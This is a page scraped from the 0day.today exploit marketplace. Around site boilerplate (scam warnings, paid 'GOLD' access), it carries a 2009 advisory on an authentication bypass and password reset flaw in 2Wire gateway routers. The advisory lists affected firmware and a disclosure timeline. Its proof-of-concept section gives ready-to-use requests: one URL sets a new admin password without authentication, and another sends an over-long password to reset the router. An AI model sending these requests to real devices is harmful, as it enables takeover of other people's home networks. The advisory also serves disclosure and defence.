0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
2WIRE Gateway Authentication Bypass & Password Reset Vulnerabilities
==================================================================== 2WIRE Gateway Authentication Bypass & Password Reset Vulnerabilities ==================================================================== 2WIRE GATEWAY AUTHENTICATION BYPASS & PASSWORD RESET (08/04/09) ============================================================== DESCRIPTION ----------------- There is an authentication bypass vulnerability in page=CD35_SETUP_01 that allows you to set a new password even if the password was previously set. By setting a new password with more than 512 characters the password gets reset and next time you access the router you will be prompted for a new password. VULNERABLE ---------------- 2Wire 2071 Gateway 2Wire 1800HW 2Wire 1701HG Firmware 5.29.51 3.17.5 3.7.1 NOT VULNERABLE -------------------- Firmware 5.29.135.5 or later DISCLOSURE TIMELINE ------------------------- 03/27/2009 - 2wire Contacted no satisfactory response 07/11/2009 - Sent complete details to 2wire no response 07/17/2009 - Sent advisory with video demo to 2wire ticket status escalated, but no response 08/02/2009 - Made public @ Defcon 17 EXPLOIT/POC ----------------- Authentication Bypass - just use this page to set a new password http://gateway.2wire.net?xslt?page=CD35_SETUP_01 Video: http://www.hakim.ws/2wire/2wire_CD35_Bypass.ogv Password Reset - using the same form but sending a password > 512 characters http://gateway.2wire.net/xslt?PAGE=CD35_SETUP_01_POST&password1=hkmhkmhkmhkmhkm hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkh kmhkmhkmhkmhkmhkmhkmhkm&password2=hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkhkmhkmhkmhkmhkmhkmhkmhkm # 0day.today [2024-06-27] #